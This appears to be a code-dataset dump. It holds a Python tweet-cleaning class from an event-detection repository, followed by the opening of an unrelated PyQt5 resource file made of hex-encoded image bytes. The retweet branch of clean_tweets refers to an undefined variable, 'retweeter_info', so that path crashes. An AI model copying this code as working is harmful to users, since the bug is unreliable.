] | permissive | xianhuaxizi/Event-Detection-from-Tweets | bb91abfa4ee495e59540c878ef6198f767db4c6a | 6bffc688b168ef30a20a6b1b27ea42f4ce1ebbc2 | refs/heads/master | 2020-04-10T15:11:18.975299 | 2018-12-05T09:34:58 | 2018-12-05T09:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,250 | py | # See the original pyTweetCleaner at https://github.com/kevalmorabia97/pyTweetCleaner
"""
REMOVE: TWEETS THAT HAVE in_reply_to_status_id !=null i.e. COMMENTS ON SOMEONE ELSE'S TWEETS
TWEETS THAT HAVE lang != en i.e. NOT IN ENGLISH LANGUAGE
DATA ABOUT DELETED TWEETS
NON-ASCII CHARACTERS FROM text
HYPERLINKS FROM text
STOPWORDS from text
#tags & @name mentions
digits[0-9] FROM text
KEEP: created_at
id
text IN LOWERCASE
user_id
user_followers_count
retweet_count
entities_hashtags, entities_user_mentions
retweeted_status REPLACES ACTUAL tweet BUT PRESERVES RETWEETER'S USER INFO
"""
import json
import re
import string
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
class TweetCleaner:
def __init__(self, remove_stop_words=True, remove_retweets=False):
"""
clean unnecessary twitter data
"""
if remove_stop_words: self.stop_words = set(stopwords.words('english'))
else: self.stop_words = set()
self.remove_retweets = remove_retweets
self.punc_table = str.maketrans("", "", string.punctuation) # to remove punctuation from each word in tokenize
def remove_non_ascii_chars(self, text):
"""
return text after removing non-ascii characters i.e. characters with ascii value >= 128
"""
return ''.join([w if ord(w) < 128 else ' ' for w in text])
def remove_hyperlinks(self,text):
"""
return text after removing hyperlinks
"""
return ' '.join([w for w in text.split(' ') if not 'http' in w])
def get_cleaned_text(self, text):
cleaned_text = text.replace('\"','').replace('\'','').replace('-',' ')
cleaned_text = self.remove_non_ascii_chars(cleaned_text)
cleaned_text = self.remove_hyperlinks(cleaned_text)
# remove digits
cleaned_text = re.sub('[0-9]+','',cleaned_text)
# remove hashtags
cleaned_text = re.sub('#[_a-zA-Z][_a-zA-Z0-9]*','',cleaned_text)
# remove @name
cleaned_text = ' '.join([w for w in cleaned_text.split() if not w.startswith('@')])
tokens = [w.translate(self.punc_table) for w in word_tokenize(cleaned_text)] # remove punctuations and tokenize
tokens = [w.lower() for w in tokens if not w.lower() in self.stop_words and len(w)>1]
cleaned_text = ' '.join(tokens)
return cleaned_text
def clean_tweets(self, input_file, output_file='cleaned_tweets.json'):
"""
input_file: name or path of input twitter json data
output_file: file name or path where cleaned twitter json data is stored (default='cleaned_tweets.json')
"""
in_file = open(input_file, 'r')
out_file = open(output_file, 'w')
while True:
line = in_file.readline()
if line=='': break
tweet = json.loads(line)
if 'retweeted_status' in tweet:
if self.remove_retweets: continue
#print('retweet')
retweeter_user_info = tweet['user']
tweet = tweet['retweeted_status'] # replace retweet with original tweet but preserve user info of retweeter
tweet['retweet_count'] = 0
tweet['user'] = retweeter_info
#if not "created_at" in tweet: continue # remove info about deleted tweets
#if not tweet['lang'] == 'en': continue # remove tweets in non engligh(or lang) language
#if not tweet['in_reply_to_status_id'] == None or not tweet['in_reply_to_user_id'] == None: continue # remove comments of any tweet
cleaned_text = self.get_cleaned_text(tweet['text'])
if cleaned_text == '': continue
cleaned_tweet = {}
cleaned_tweet['created_at'] = tweet['created_at']
#cleaned_tweet['id'] = tweet['id']
cleaned_tweet['text'] = cleaned_text
cleaned_tweet['user'] = {}
cleaned_tweet['user']['id'] = tweet['user']['id']
cleaned_tweet['user']['followers_count'] = tweet['user']['followers_count']
cleaned_tweet['retweet_count'] = tweet['retweet_count']
cleaned_tweet['entities'] = {}
cleaned_tweet['entities']['hashtags'] = [ht['text'] for ht in tweet['entities']['hashtags']]
cleaned_tweet['entities']['user_mentions'] = [self.remove_non_ascii_chars(um['name']) for um in tweet['entities']['user_mentions']]
out_file.write(json.dumps(cleaned_tweet)+'\n')
in_file.close()
out_file.close()
if __name__ == '__main__':
tc = TweetCleaner(remove_stop_words=True, remove_retweets=True)
print(tc.get_cleaned_text('The movie The Twilight Saga: New Moon was the biggest winner in MTV Movie Awards 2010; it took 4 out of 10 "Best" Awards #IAmGreat'))
print('\nTweetCleaning DONE...')
| [
"[email protected]"
] | |
840bcb743804cd91fc28d3d3902ca7bcb109294b | 0be06356283a42aadea9165340f6d55e816a7bf5 | /client/ui/resource_rc.py | 9577aa3fbc6e8e18dec582f95cf4facdf6bef938 | [] | no_license | mvisat/sujeongku | fb74427ec488d137a993d7e105a718c44f253826 | 52a74d7c5553fa952cd563d9575ebd3bfeaf04b4 | refs/heads/master | 2021-01-10T06:53:07.914993 | 2015-12-04T14:34:42 | 2015-12-04T14:34:42 | 46,903,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 995,660 | py | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.3.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x23\x60\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x02\x00\x00\x00\x02\x00\x08\x06\x00\x00\x00\xf4\x78\xd4\xfa\
\x00\x00\x20\x00\x49\x44\x41\x54\x78\x5e\xed\xdd\x8b\x91\x1c\xc7\
\x91\x06\xe0\x1e\x3a\x20\x98\x00\x59\x40\x78\x70\xf4\x48\x30\x85\
\x92\x05\xa0\x27\x3c\x0f\xe8\xc1\x51\x1e\xd0\x02\xcd\xc5\x82\x80\
\x88\xc7\xee\x4e\x3f\xaa\xba\xf3\xf1\x29\x82\x41\x45\xa0\xbb\xba\
\xf2\xcb\xba\xe0\x3f\x59\x0c\xdd\x6d\xf1\x1f\x02\x04\x08\x10\x20\
\x40\xa0\x9d\xc0\xad\x5d\xc5\x0a\x26\x40\x80\x00\x01\x02\x04\x16\
\x01\xc0\x21\x20\x40\x80\x00\x01\x02\x0d\x05\x04\x80\x86\x4d\x57\
\x32\x01\x02\x04\x08\x10\x10\x00\x9c\x01\x02\x04\x08\x10\x20\xd0\
\x50\x40\x00\x68\xd8\x74\x25\x13\x20\x40\x80\x00\x01\x01\xc0\x19\
\x20\x40\x80\x00\x01\x02\x0d\x05\x04\x80\x86\x4d\x57\x32\x01\x02\
\x04\x08\x10\x10\x00\x9c\x01\x02\x04\x08\x10\x20\xd0\x50\x40\x00\
\x68\xd8\x74\x25\x13\x20\x40\x80\x00\x01\x01\xc0\x19\x20\x40\x80\
\x00\x01\x02\x0d\x05\x04\x80\x86\x4d\x57\x32\x01\x02\x04\x08\x10\
\x10\x00\x9c\x01\x02\x04\x08\x10\x20\xd0\x50\x40\x00\x68\xd8\x74\
\x25\x13\x20\x40\x80\x00\x01\x01\xc0\x19\x20\x40\x80\x00\x01\x02\
\x0d\x05\x04\x80\x86\x4d\x57\x32\x01\x02\x04\x08\x10\x10\x00\x9c\
\x01\x02\x04\x08\x10\x20\xd0\x50\x40\x00\x68\xd8\x74\x25\x13\x20\
\x40\x80\x00\x01\x01\xc0\x19\x20\x40\x80\x00\x01\x02\x0d\x05\x04\
\x80\x86\x4d\x57\x32\x01\x02\x04\x08\x10\x10\x00\x9c\x01\x02\x04\
\x08\x10\x20\xd0\x50\x40\x00\x68\xd8\x74\x25\x13\x20\x40\x80\x00\
\x01\x01\xc0\x19\x20\x40\x80\x00\x01\x02\x0d\x05\x04\x80\x86\x4d\
\x57\x32\x01\x02\x04\x08\x10\x10\x00\x9c\x01\x02\x04\x08\x10\x20\
\xd0\x50\x40\x00\x68\xd8\x74\x25\x13\x20\x40\x80\x00\x01\x01\xc0\
\x19\x20\x40\x80\x00\x01\x02\x0d\x05\x04\x80\x86\x4d\x57\x32\x01\
\x02\x04\x08\x10\x10\x00\x9c\x01\x02\x04\x08\x10\x20\xd0\x50\x40\
\x00\x68\xd8\x74\x25\x13\x20\x40\x80\x00\x01\x01\xc0\x19\x20\x40\
\x80\x00\x01\x02\x0d\x05\x04\x80\x86\x4d\x57\x32\x01\x02\x04\x08\
\x10\x10\x00\x9c\x01\x02\x04\x08\x10\x20\xd0\x50\x40\x00\x68\xd8\
\x74\x25\x13\x20\x40\x80\x00\x01\x01\xc0\x19\x20\x40\x80\x00\x01\
\x02\x0d\x05\x04\x80\x86\x4d\x57\x32\x01\x02\x04\x08\x10\xb8\xdd\
\x7f\xfe\xfd\xa7\xdb\xfb\xb7\xbf\xa2\x20\x40\x80\x00\x01\x02\x04\
\xfa\x08\x3c\x05\x80\xfb\x72\xbb\xfd\xba\x2c\xff\xf9\x70\xfb\xc7\
\xdf\x7f\xe9\x53\xba\x4a\x09\x10\x20\x40\x80\x40\x5f\x81\x3f\x03\
\xc0\xe7\xff\xdc\x6e\xbf\x2f\xcb\xf2\x61\xb9\xdf\xff\x79\x7b\xff\
\xf6\x8f\xbe\x2c\x2a\x27\x40\x80\x00\x01\x02\xb5\x05\xbe\x0e\x00\
\x5f\xd6\x7a\xbb\x7d\x0e\x02\xbf\xd5\x26\x50\x1d\x01\x02\x04\x08\
\x10\xe8\x27\xf0\x72\x00\xf8\x6b\x2a\xe0\x7a\xa0\xdf\xb9\x50\x31\
\x01\x02\x04\x08\x14\x17\x78\x1c\x00\x5c\x0f\x14\x3f\x02\xca\x23\
\x40\x80\x00\x81\x8e\x02\xeb\x03\x80\xeb\x81\x8e\xe7\x43\xcd\x04\
\x08\x10\x20\x50\x54\x60\x5f\x00\x70\x3d\x50\xf4\x38\x28\x8b\x00\
\x01\x02\x04\xba\x08\x1c\x0b\x00\xae\x07\xba\x9c\x13\x75\x12\x20\
\x40\x80\x40\x31\x81\x31\x01\xc0\xf5\x40\xb1\x63\xa1\x1c\x02\x04\
\x08\x10\xa8\x2e\x30\x3e\x00\xb8\x1e\xa8\x7e\x66\xd4\x47\x80\x00\
\x01\x02\x05\x04\xe6\x05\x00\xd7\x03\x05\x8e\x87\x12\x08\x10\x20\
\x40\xa0\xaa\xc0\xfc\x00\xe0\x7a\xa0\xea\xd9\x51\x17\x01\x02\x04\
\x08\x24\x16\x38\x37\x00\xb8\x1e\x48\x7c\x54\x6c\x9d\x00\x01\x02\
\x04\x2a\x09\x5c\x13\x00\x5c\x0f\x54\x3a\x43\x6a\x21\x40\x80\x00\
\x81\x84\x02\xd7\x06\x00\xd7\x03\x09\x8f\x8c\x2d\x13\x20\x40\x80\
\x40\x05\x81\x38\x01\xc0\xf5\x40\x85\xf3\xa4\x06\x02\x04\x08\x10\
\x48\x22\x10\x2f\x00\xb8\x1e\x48\x72\x74\x6c\x93\x00\x01\x02\x04\
\x32\x0b\xc4\x0d\x00\xae\x07\x32\x9f\x2b\x7b\x27\x40\x80\x00\x81\
\xe0\x02\x39\x02\x80\xeb\x81\xe0\xc7\xc8\xf6\x08\x10\x20\x40\x20\
\x9b\x40\xae\x00\xe0\x7a\x20\xdb\xf9\xb2\x5f\x02\x04\x08\x10\x08\
\x2a\x90\x33\x00\xb8\x1e\x08\x7a\x9c\x6c\x8b\x00\x01\x02\x04\xb2\
\x08\xe4\x0f\x00\xae\x07\xb2\x9c\x35\xfb\x24\x40\x80\x00\x81\x40\
\x02\x75\x02\x80\xeb\x81\x40\xc7\xca\x56\x08\x10\x20\x40\x20\xba\
\x40\xbd\x00\xe0\x7a\x20\xfa\x99\xb3\x3f\x02\x04\x08\x10\x08\x20\
\x50\x3b\x00\xb8\x1e\x08\x70\xc4\x6c\x81\x00\x01\x02\x04\x22\x0a\
\xf4\x08\x00\xae\x07\x22\x9e\x3d\x7b\x22\x40\x80\x00\x81\x0b\x05\
\x7a\x05\x00\xd7\x03\x17\x1e\x35\x9f\x26\x40\x80\x00\x81\x48\x02\
\x7d\x03\x80\xeb\x81\x48\xe7\xd0\x5e\x08\x10\x20\x40\xe0\x64\x01\
\x01\xc0\xf5\xc0\xc9\x47\xce\xe7\x08\x10\x20\x40\x20\x82\x80\x00\
\xf0\x5c\x17\x6e\xb7\x0f\xcb\xfd\xfe\xcf\xdb\xfb\xb7\xbf\x45\x68\
\x92\x3d\x10\x20\x40\x80\x00\x81\xd1\x02\x02\xc0\x6b\xa2\xb7\xdb\
\xaf\xcb\xf2\x9f\x0f\xb7\x7f\xfc\xfd\x97\xd1\xf0\xd6\x23\x40\x80\
\x00\x01\x02\x57\x0a\x08\x00\x6b\xf4\x6f\xb7\xdf\x97\x65\xf9\x3c\
\x15\xf8\x63\xcd\x2b\x9e\x21\x40\x80\x00\x01\x02\x91\x05\x04\x80\
\xad\xdd\x71\x3d\xb0\x55\xcc\xf3\x04\x08\x10\x20\x10\x50\x40\x00\
\xd8\xdb\x14\xd7\x03\x7b\xe5\xbc\x47\x80\x00\x01\x02\x01\x04\x04\
\x80\xa3\x4d\x70\x3d\x70\x54\xd0\xfb\x04\x08\x10\x20\x70\x81\x80\
\x00\x30\x12\xdd\xf5\xc0\x48\x4d\x6b\x11\x20\x40\x80\xc0\x44\x01\
\x01\x60\x06\xae\xeb\x81\x19\xaa\xd6\x24\x40\x80\x00\x81\x81\x02\
\x02\xc0\x40\xcc\xef\x96\x72\x3d\x30\x53\xd7\xda\x04\x08\x10\x20\
\x70\x40\x40\x00\x38\x80\xb7\xe9\x55\xd7\x03\x9b\xb8\x3c\x4c\x80\
\x00\x01\x02\x73\x05\x04\x80\xb9\xbe\xdf\xaf\xee\x7a\xe0\x6c\x71\
\xdf\x23\x40\x80\x00\x81\x67\x04\x04\x80\xab\x8e\x85\xeb\x81\xab\
\xe4\x7d\x97\x00\x01\x02\x04\x96\x65\x11\x00\x22\x1c\x03\xd7\x03\
\x11\xba\x60\x0f\x04\x08\x10\x68\x25\x20\x00\x44\x6a\xb7\xeb\x81\
\x48\xdd\xb0\x17\x02\x04\x08\x94\x16\x10\x00\x22\xb6\xd7\xf5\x40\
\xc4\xae\xd8\x13\x01\x02\x04\x4a\x09\x08\x00\xd1\xdb\xe9\x7a\x20\
\x7a\x87\xec\x8f\x00\x01\x02\x29\x05\x04\x80\x2c\x6d\x73\x3d\x90\
\xa5\x53\xf6\x49\x80\x00\x81\x14\x02\x02\x40\x8a\x36\x7d\xb1\x49\
\xd7\x03\xd9\x3a\x66\xbf\x04\x08\x10\x08\x29\x20\x00\x84\x6c\xcb\
\xca\x4d\xb9\x1e\x58\x09\xe5\x31\x02\x04\x08\x10\xf8\x56\x40\x00\
\xa8\x70\x26\x5c\x0f\x54\xe8\xa2\x1a\x08\x10\x20\x70\xaa\x80\x00\
\x70\x2a\xf7\xe4\x8f\xb9\x1e\x98\x0c\x6c\x79\x02\x04\x08\xd4\x11\
\x10\x00\xea\xf4\xf2\xeb\x4a\x5c\x0f\x54\xed\xac\xba\x08\x10\x20\
\x30\x44\x40\x00\x18\xc2\x18\x78\x11\xd7\x03\x81\x9b\x63\x6b\x04\
\x08\x10\xb8\x4e\x40\x00\xb8\xce\xfe\xdc\x2f\xbb\x1e\x38\xd7\xdb\
\xd7\x08\x10\x20\x10\x5c\x40\x00\x08\xde\xa0\x29\xdb\x73\x3d\x30\
\x85\xd5\xa2\x04\x08\x10\xc8\x24\x20\x00\x64\xea\xd6\xe8\xbd\xba\
\x1e\x18\x2d\x6a\x3d\x02\x04\x08\xa4\x11\x10\x00\xd2\xb4\x6a\xe2\
\x46\x5d\x0f\x4c\xc4\xb5\x34\x01\x02\x04\x62\x0a\x08\x00\x31\xfb\
\x72\xdd\xae\x5c\x0f\x5c\x67\xef\xcb\x04\x08\x10\x38\x51\x40\x00\
\x38\x11\x3b\xd5\xa7\x5c\x0f\xa4\x6a\x97\xcd\x12\x20\x40\x60\xab\
\x80\x00\xb0\x55\xac\xdb\xf3\xae\x07\xba\x75\x5c\xbd\x04\x08\x34\
\x11\x10\x00\x9a\x34\x7a\x48\x99\xae\x07\x86\x30\x5a\x84\x00\x01\
\x02\x11\x04\x04\x80\x08\x5d\xc8\xb6\x07\xd7\x03\xd9\x3a\x66\xbf\
\x04\x08\x10\xf8\x4e\x40\x00\x70\x28\xf6\x0b\xb8\x1e\xd8\x6f\xe7\
\x4d\x02\x04\x08\x5c\x2c\x20\x00\x5c\xdc\x80\x32\x9f\x77\x3d\x50\
\xa6\x95\x0a\x21\x40\xa0\x87\x80\x00\xd0\xa3\xcf\xe7\x55\xe9\x7a\
\xe0\x3c\x6b\x5f\x22\x40\x80\xc0\x01\x01\x01\xe0\x00\x9e\x57\x5f\
\x11\x70\x3d\xe0\x78\x10\x20\x40\x20\xb4\x80\x00\x10\xba\x3d\x45\
\x36\xe7\x7a\xa0\x48\x23\x95\x41\x80\x40\x25\x01\x01\xa0\x52\x37\
\xa3\xd7\xe2\x7a\x20\x7a\x87\xec\x8f\x00\x81\x46\x02\x02\x40\xa3\
\x66\x87\x29\xd5\xf5\x40\x98\x56\xd8\x08\x01\x02\x7d\x05\x04\x80\
\xbe\xbd\x8f\x51\xb9\xeb\x81\x18\x7d\xb0\x0b\x02\x04\xda\x09\x08\
\x00\xed\x5a\x1e\xb4\x60\xd7\x03\x41\x1b\x63\x5b\x04\x08\x54\x15\
\x10\x00\xaa\x76\x36\x6b\x5d\xae\x07\xb2\x76\xce\xbe\x09\x10\x48\
\x26\x20\x00\x24\x6b\x58\xab\xed\xba\x1e\x68\xd5\x6e\xc5\x12\x20\
\x70\xae\x80\x00\x70\xae\xb7\xaf\xed\x11\x70\x3d\xb0\x47\xcd\x3b\
\x04\x08\x10\x78\x55\x40\x00\x70\x40\xf2\x08\xb8\x1e\xc8\xd3\x2b\
\x3b\x25\x40\x20\xbc\x80\x00\x10\xbe\x45\x36\xf8\xac\x80\xeb\x01\
\x07\x83\x00\x01\x02\x87\x04\x04\x80\x43\x7c\x5e\xbe\x5c\xc0\xf5\
\xc0\xe5\x2d\xb0\x01\x02\x04\x72\x0a\x08\x00\x39\xfb\x66\xd7\xdf\
\x0a\xb8\x1e\x70\x26\x08\x10\x20\xb0\x49\x40\x00\xd8\xc4\xe5\xe1\
\x14\x02\xae\x07\x52\xb4\xc9\x26\x09\x10\xb8\x56\x40\x00\xb8\xd6\
\xdf\xd7\x67\x0a\xb8\x1e\x98\xa9\x6b\x6d\x02\x04\x92\x0b\x08\x00\
\xc9\x1b\x68\xfb\x2b\x04\x5c\x0f\xac\x40\xf2\x08\x01\x02\xdd\x04\
\x04\x80\x6e\x1d\xef\x5e\xaf\xeb\x81\xee\x27\x40\xfd\x04\x08\x7c\
\x12\x10\x00\x1c\x85\x9e\x02\xae\x07\x7a\xf6\x5d\xd5\x04\x08\xfc\
\x57\x40\x00\x70\x18\x7a\x0b\xb8\x1e\xe8\xdd\x7f\xd5\x13\x68\x2c\
\x20\x00\x34\x6e\xbe\xd2\xbf\x11\x70\x3d\xe0\x48\x10\x20\xd0\x48\
\x40\x00\x68\xd4\x6c\xa5\xae\x14\x70\x3d\xb0\x12\xca\x63\x04\x08\
\x64\x16\x10\x00\x32\x77\xcf\xde\xe7\x0a\xb8\x1e\x98\xeb\x6b\x75\
\x02\x04\x2e\x15\x10\x00\x2e\xe5\xf7\xf1\x34\x02\xae\x07\xd2\xb4\
\xca\x46\x09\x10\x58\x27\x20\x00\xac\x73\xf2\x14\x81\x3f\x05\x5c\
\x0f\x38\x09\x04\x08\x14\x11\x10\x00\x8a\x34\x52\x19\x27\x0b\xb8\
\x1e\x38\x19\xdc\xe7\x08\x10\x18\x2d\x20\x00\x8c\x16\xb5\x5e\x3f\
\x01\xd7\x03\xfd\x7a\xae\x62\x02\x05\x04\x04\x80\x02\x4d\x54\x42\
\x10\x01\xd7\x03\x41\x1a\x61\x1b\x04\x08\xac\x11\x10\x00\xd6\x28\
\x79\x86\xc0\x16\x01\xd7\x03\x5b\xb4\x3c\x4b\x80\xc0\x45\x02\x02\
\xc0\x45\xf0\x3e\xdb\x44\xc0\xf5\x40\x93\x46\x2b\x93\x40\x3e\x01\
\x01\x20\x5f\xcf\xec\x38\xa3\x80\xeb\x81\x8c\x5d\xb3\x67\x02\xa5\
\x05\x04\x80\xd2\xed\x55\x5c\x38\x01\xd7\x03\xe1\x5a\x62\x43\x04\
\xba\x0a\x08\x00\x5d\x3b\xaf\xee\xeb\x05\x5c\x0f\x5c\xdf\x03\x3b\
\x20\xd0\x58\x40\x00\x68\xdc\x7c\xa5\x07\x11\x70\x3d\x10\xa4\x11\
\xb6\x41\xa0\x97\x80\x00\xd0\xab\xdf\xaa\x8d\x2c\xe0\x7a\x20\x72\
\x77\xec\x8d\x40\x39\x01\x01\xa0\x5c\x4b\x15\x54\x42\xc0\xf5\x40\
\x89\x36\x2a\x82\x40\x64\x01\x01\x20\x72\x77\xec\x8d\x80\xeb\x01\
\x67\x80\x00\x81\x49\x02\x02\xc0\x24\x58\xcb\x12\x18\x2a\xe0\x7a\
\x60\x28\xa7\xc5\x08\x10\x58\x16\x01\xc0\x29\x20\x90\x4d\xc0\xf5\
\x40\xb6\x8e\xd9\x2f\x81\x90\x02\x02\x40\xc8\xb6\xd8\x14\x81\x15\
\x02\xae\x07\x56\x20\x79\x84\x00\x81\x97\x04\x04\x00\x67\x83\x40\
\x76\x01\xd7\x03\xd9\x3b\x68\xff\x04\x2e\x11\x10\x00\x2e\x61\xf7\
\x51\x02\x93\x04\x5c\x0f\x4c\x82\xb5\x2c\x81\x7a\x02\x02\x40\xbd\
\x9e\xaa\x88\xc0\xb2\xb8\x1e\x70\x0a\x08\x10\x78\x20\x20\x00\x38\
\x22\x04\x2a\x0b\xb8\x1e\xa8\xdc\x5d\xb5\x11\x38\x24\x20\x00\x1c\
\xe2\xf3\x32\x81\x44\x02\xae\x07\x12\x35\xcb\x56\x09\xcc\x17\x10\
\x00\xe6\x1b\xfb\x02\x81\x58\x02\xae\x07\x62\xf5\xc3\x6e\x08\x5c\
\x24\x20\x00\x5c\x04\xef\xb3\x04\x2e\x17\x70\x3d\x70\x79\x0b\x6c\
\x80\xc0\x95\x02\x02\xc0\x95\xfa\xbe\x4d\x20\x8a\x80\xeb\x81\x28\
\x9d\xb0\x0f\x02\xa7\x09\x08\x00\xa7\x51\xfb\x10\x81\x04\x02\xae\
\x07\x12\x34\xc9\x16\x09\x8c\x11\x10\x00\xc6\x38\x5a\x85\x40\x2d\
\x01\xd7\x03\xb5\xfa\xa9\x1a\x02\xcf\x08\x08\x00\x8e\x05\x01\x02\
\xaf\x0b\xb8\x1e\x70\x42\x08\x94\x14\x10\x00\x4a\xb6\x55\x51\x04\
\x26\x08\xb8\x1e\x98\x80\x6a\x49\x02\xd7\x09\x08\x00\xd7\xd9\xfb\
\x32\x81\x9c\x02\xae\x07\x72\xf6\xcd\xae\x09\x7c\x23\x20\x00\x38\
\x12\x04\x08\xec\x17\x70\x3d\xb0\xdf\xce\x9b\x04\x2e\x16\x10\x00\
\x2e\x6e\x80\xcf\x13\x28\x21\xe0\x7a\xa0\x44\x1b\x15\xd1\x4b\x40\
\x00\xe8\xd5\x6f\xd5\x12\x98\x2b\xe0\x7a\x60\xae\xaf\xd5\x09\x0c\
\x14\x10\x00\x06\x62\x5a\x8a\x00\x81\x2f\x04\x5c\x0f\x38\x0e\x04\
\x42\x0b\x08\x00\xa1\xdb\x63\x73\x04\x0a\x08\xb8\x1e\x28\xd0\x44\
\x25\x54\x14\x10\x00\x2a\x76\x55\x4d\x04\x22\x0a\xb8\x1e\x88\xd8\
\x15\x7b\x6a\x2c\x20\x00\x34\x6e\xbe\xd2\x09\x5c\x26\xe0\x7a\xe0\
\x32\x7a\x1f\x26\xf0\x59\x40\x00\x70\x16\x08\x10\xb8\x4e\xc0\xf5\
\xc0\x75\xf6\xbe\xdc\x5e\x40\x00\x68\x7f\x04\x00\x10\x08\x20\xe0\
\x7a\x20\x40\x13\x6c\xa1\x9b\x80\x00\xd0\xad\xe3\xea\x25\x10\x5d\
\xc0\xf5\x40\xf4\x0e\xd9\x5f\x11\x01\x01\xa0\x48\x23\x95\x41\xa0\
\x9c\x80\xeb\x81\x72\x2d\x55\x50\x2c\x01\x01\x20\x56\x3f\xec\x86\
\x00\x81\x6f\x05\x5c\x0f\x38\x13\x04\xa6\x08\x08\x00\x53\x58\x2d\
\x4a\x80\xc0\x14\x01\xd7\x03\x53\x58\x2d\xda\x53\x40\x00\xe8\xd9\
\x77\x55\x13\xc8\x2d\xe0\x7a\x20\x77\xff\xec\x3e\x84\x80\x00\x10\
\xa2\x0d\x36\x41\x80\xc0\x2e\x01\xd7\x03\xbb\xd8\xbc\x44\xe0\x49\
\x40\x00\x70\x0e\x08\x10\xa8\x21\xe0\x7a\xa0\x46\x1f\x55\x71\x9a\
\x80\x00\x70\x1a\xb5\x0f\x11\x20\x70\x8a\x80\xeb\x81\x53\x98\x7d\
\x24\xbf\x80\x00\x90\xbf\x87\x2a\x20\x40\xe0\x39\x01\xd7\x03\xce\
\x05\x81\x57\x05\x04\x00\x07\x84\x00\x81\xfa\x02\xae\x07\xea\xf7\
\x58\x85\x9b\x05\x04\x80\xcd\x64\x5e\x20\x40\x20\xad\x80\xeb\x81\
\xb4\xad\xb3\xf1\xf1\x02\x02\xc0\x78\x53\x2b\x12\x20\x10\x5d\xc0\
\xf5\x40\xf4\x0e\xd9\xdf\x09\x02\x02\xc0\x09\xc8\x3e\x41\x80\x40\
\x60\x01\xd7\x03\x81\x9b\x63\x6b\x33\x05\x04\x80\x99\xba\xd6\x26\
\x40\x20\x8f\x80\xeb\x81\x3c\xbd\xb2\xd3\x21\x02\x02\xc0\x10\x46\
\x8b\x10\x20\x50\x46\xc0\xf5\x40\x99\x56\x2a\xe4\x75\x01\x01\xc0\
\x09\x21\x40\x80\xc0\x4b\x02\xae\x07\x9c\x8d\xc2\x02\x02\x40\xe1\
\xe6\x2a\x8d\x00\x81\x41\x02\xae\x07\x06\x41\x5a\x26\x92\x80\x00\
\x10\xa9\x1b\xf6\x42\x80\x40\x6c\x01\xd7\x03\xb1\xfb\x63\x77\x9b\
\x04\x04\x80\x4d\x5c\x1e\x26\x40\x80\xc0\x27\x01\xd7\x03\x8e\x42\
\x72\x01\x01\x20\x79\x03\x6d\x9f\x00\x81\x8b\x05\x5c\x0f\x5c\xdc\
\x00\x9f\xdf\x2b\x20\x00\xec\x95\xf3\x1e\x01\x02\x04\xbe\x14\x70\
\x3d\xe0\x3c\x24\x13\x10\x00\x92\x35\xcc\x76\x09\x10\x48\x20\xe0\
\x7a\x20\x41\x93\x6c\x51\x00\x70\x06\x08\x10\x20\x30\x4b\xc0\xf5\
\xc0\x2c\x59\xeb\x0e\x10\x10\x00\x06\x20\x5a\x82\x00\x01\x02\xaf\
\x0a\xb8\x1e\x70\x40\x02\x0a\x08\x00\x01\x9b\x62\x4b\x04\x08\x14\
\x16\x70\x3d\x50\xb8\xb9\xb9\x4a\x13\x00\x72\xf5\xcb\x6e\x09\x10\
\xa8\x22\xe0\x7a\xa0\x4a\x27\xd3\xd6\x21\x00\xa4\x6d\x9d\x8d\x13\
\x20\x50\x42\xc0\xf5\x40\x89\x36\x66\x2c\x42\x00\xc8\xd8\x35\x7b\
\x26\x40\xa0\xa6\x80\xeb\x81\x9a\x7d\x0d\x5a\x95\x00\x10\xb4\x31\
\xb6\x45\x80\x40\x63\x01\xd7\x03\x8d\x9b\x7f\x5e\xe9\x02\xc0\x79\
\xd6\xbe\x44\x80\x00\x81\x6d\x02\xae\x07\xb6\x79\x79\x7a\x93\x80\
\x00\xb0\x89\xcb\xc3\x04\x08\x10\xb8\x48\xc0\xf5\xc0\x45\xf0\x75\
\x3f\x2b\x00\xd4\xed\xad\xca\x08\x10\xa8\x28\xe0\x7a\xa0\x62\x57\
\x2f\xa9\x49\x00\xb8\x84\xdd\x47\x09\x10\x20\x70\x50\xc0\xf5\xc0\
\x41\x40\xaf\x0b\x00\xce\x00\x01\x02\x04\xb2\x0b\xb8\x1e\xc8\xde\
\xc1\x4b\xf6\x2f\x00\x5c\xc2\xee\xa3\x04\x08\x10\x98\x20\xe0\x7a\
\x60\x02\x6a\xdd\x25\x05\x80\xba\xbd\x55\x19\x01\x02\x5d\x05\x5c\
\x0f\x74\xed\xfc\xa6\xba\x05\x80\x4d\x5c\x1e\x26\x40\x80\x40\x32\
\x01\xd7\x03\xc9\x1a\x76\xde\x76\x05\x80\xf3\xac\x7d\x89\x00\x01\
\x02\xd7\x09\xb8\x1e\xb8\xce\x3e\xe8\x97\x05\x80\xa0\x8d\xb1\x2d\
\x02\x04\x08\x4c\x11\x70\x3d\x30\x85\x35\xe3\xa2\x02\x40\xc6\xae\
\xd9\x33\x01\x02\x04\x46\x08\xb8\x1e\x18\xa1\x98\x76\x0d\x01\x20\
\x6d\xeb\x6c\x9c\x00\x01\x02\x83\x04\x5c\x0f\x0c\x82\xcc\xb5\x8c\
\x00\x90\xab\x5f\x76\x4b\x80\x00\x81\x79\x02\xae\x07\xe6\xd9\x06\
\x5c\x59\x00\x08\xd8\x14\x5b\x22\x40\x80\xc0\xe5\x02\xae\x07\x2e\
\x6f\xc1\xec\x0d\x08\x00\xb3\x85\xad\x4f\x80\x00\x81\xcc\x02\xae\
\x07\x32\x77\xef\xd5\xbd\x0b\x00\x65\x5b\xab\x30\x02\x04\x08\x0c\
\x14\x70\x3d\x30\x10\x33\xc6\x52\x4f\x01\xe0\xa7\x65\x59\x9e\xfe\
\x5a\x96\xe5\xf6\xf4\xf7\x37\xcb\x72\xff\x31\xc6\xf6\xec\x82\x00\
\x01\x02\x04\xc2\x09\xb8\x1e\x08\xd7\x92\x3d\x1b\xba\xbd\xf4\xd2\
\xfd\xe7\xdf\xdf\x2c\xcb\xf2\x6e\x59\x96\xb7\x7f\xfd\x75\x7b\xfa\
\xef\xef\x96\xe5\xfe\xb7\x3d\x1f\xf3\x0e\x01\x02\x04\x08\x14\x12\
